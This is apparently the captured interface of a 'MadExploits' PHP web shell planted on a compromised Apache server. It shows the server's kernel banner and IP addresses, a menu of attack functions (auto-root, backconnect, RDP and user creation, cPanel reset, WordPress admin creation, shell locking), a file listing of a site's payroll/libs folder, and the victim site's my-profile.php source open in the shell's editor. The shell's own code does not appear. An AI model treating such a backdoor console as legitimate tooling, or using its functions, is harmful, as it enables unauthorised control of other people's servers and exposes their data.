Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.116.62.169
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
wwwroot /
jdcpatala.org /
payroll /
libs /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
assets1
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
captcha.php
370
B
-rw-r--r--
change-password.php
4.34
KB
-rw-r--r--
check_availability.php
798
B
-rw-r--r--
dashboard.php
2.42
KB
-rw-r--r--
getBookRecord.php
3.34
KB
-rw-r--r--
index.php
2.85
KB
-rw-r--r--
issued-books.php
5.83
KB
-rw-r--r--
logout.php
376
B
-rw-r--r--
my-profile.php
4.59
KB
-rw-r--r--
opac.php
18.38
KB
-rw-r--r--
signup.php
5.43
KB
-rw-r--r--
studentid.txt
6
B
-rw-r--r--
user-forgot-password.php
4.31
KB
-rw-r--r--
userLogin.php
2.85
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : my-profile.php
<?php session_start(); include('includes/config.php'); error_reporting(0); if(strlen($_SESSION['login'])==0) { header('location:index.php'); } else{ if(isset($_POST['update'])) { $sid=$_SESSION['stdid']; $fname=$_POST['fullanme']; $mobileno=$_POST['mobileno']; $sql="update tblstudents set FullName=:fname,MobileNumber=:mobileno where StudentId=:sid"; $query = $dbh->prepare($sql); $query->bindParam(':sid',$sid,PDO::PARAM_STR); $query->bindParam(':fname',$fname,PDO::PARAM_STR); $query->bindParam(':mobileno',$mobileno,PDO::PARAM_STR); $query->execute(); echo '<script>alert("Your profile has been updated")</script>'; } ?> <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <meta name="description" content="" /> <meta name="author" content="" /> <!--[if IE]> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <![endif]--> <title>Online Library Management System | Student Signup</title> <!-- BOOTSTRAP CORE STYLE --> <link href="assets/css/bootstrap.css" rel="stylesheet" /> <!-- FONT AWESOME STYLE --> <link href="assets/css/font-awesome.css" rel="stylesheet" /> <!-- CUSTOM STYLE --> <link href="assets/css/style.css" rel="stylesheet" /> <!-- GOOGLE FONT --> <link href='http://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet' type='text/css' /> </head> <body> <!------MENU SECTION START--> <?php include('includes/header.php');?> <!-- MENU SECTION END--> <div class="content-wrapper"> <div class="container"> <div class="row pad-botm"> <div class="col-md-12"> <h4 class="header-line">My Profile</h4> </div> </div> <div class="row"> <div class="col-md-9 col-md-offset-1"> <div class="panel panel-danger"> <div class="panel-heading"> My Profile </div> <div class="panel-body"> <form name="signup" method="post"> <?php $sid=$_SESSION['stdid']; $sql="SELECT StudentId,FullName,EmailId,MobileNumber,RegDate,UpdationDate,Status from tblstudents where StudentId=:sid "; $query = $dbh -> prepare($sql); $query-> bindParam(':sid', $sid, PDO::PARAM_STR); $query->execute(); $results=$query->fetchAll(PDO::FETCH_OBJ); $cnt=1; if($query->rowCount() > 0) { foreach($results as $result) { ?> <div class="form-group"> <label>Student ID : </label> <?php echo htmlentities($result->StudentId);?> </div> <div class="form-group"> <label>Reg Date : </label> <?php echo htmlentities($result->RegDate);?> </div> <?php if($result->UpdationDate!=""){?> <div class="form-group"> <label>Last Updation Date : </label> <?php echo htmlentities($result->UpdationDate);?> </div> <?php } ?> <div class="form-group"> <label>Profile Status : </label> <?php if($result->Status==1){?> <span style="color: green">Active</span> <?php } else { ?> <span style="color: red">Blocked</span> <?php }?> </div> <div class="form-group"> <label>Enter Full Name</label> <input class="form-control" type="text" name="fullanme" value="<?php echo htmlentities($result->FullName);?>" autocomplete="off" required /> </div> <div class="form-group"> <label>Mobile Number :</label> <input class="form-control" type="text" name="mobileno" maxlength="10" value="<?php echo htmlentities($result->MobileNumber);?>" autocomplete="off" required /> </div> <div class="form-group"> <label>Enter Email</label> <input class="form-control" type="email" name="email" id="emailid" value="<?php echo htmlentities($result->EmailId);?>" autocomplete="off" required readonly /> </div> <?php }} ?> <button type="submit" name="update" class="btn btn-primary" id="submit">Update Now </button> </form> </div> </div> </div> </div> </div> </div> <!-- CONTENT-WRAPPER SECTION END--> <?php include('includes/footer.php');?> <script src="assets/js/jquery-1.10.2.js"></script> <!-- BOOTSTRAP SCRIPTS --> <script src="assets/js/bootstrap.js"></script> <!-- CUSTOM SCRIPTS --> <script src="assets/js/custom.js"></script> </body> </html> <?php } ?>
Close